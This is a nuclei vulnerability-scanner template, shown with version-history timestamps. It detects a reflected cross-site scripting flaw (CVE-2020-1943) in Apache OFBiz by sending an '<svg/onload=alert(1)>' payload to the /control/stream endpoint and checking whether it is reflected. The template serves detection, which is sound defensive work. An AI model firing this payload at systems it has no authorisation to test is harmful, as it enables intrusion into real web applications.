nuclei-templates/cves/2020/CVE-2020-1943.yaml

28 lines
499 B
YAML
Raw Normal View History

2021-01-09 14:45:11 +00:00
id: CVE-2020-1943
info:
name: Apache OFBiz Reflected XSS
2021-01-10 14:15:36 +00:00
author: pd-team
2021-01-09 14:45:11 +00:00
severity: medium
tags: cve,cve2020,apache,xss
2021-01-09 14:45:11 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/control/stream?contentId=<svg/onload=alert(1)>'
matchers-condition: and
matchers:
- type: word
words:
- "<svg/onload=alert(1)>"
part: body
2021-01-11 06:44:22 +00:00
2021-01-09 14:45:11 +00:00
- type: word
words:
2021-01-11 06:44:22 +00:00
- "text/html"
2021-01-09 14:45:11 +00:00
part: header
2021-01-11 06:44:22 +00:00
- type: status
status:
- 200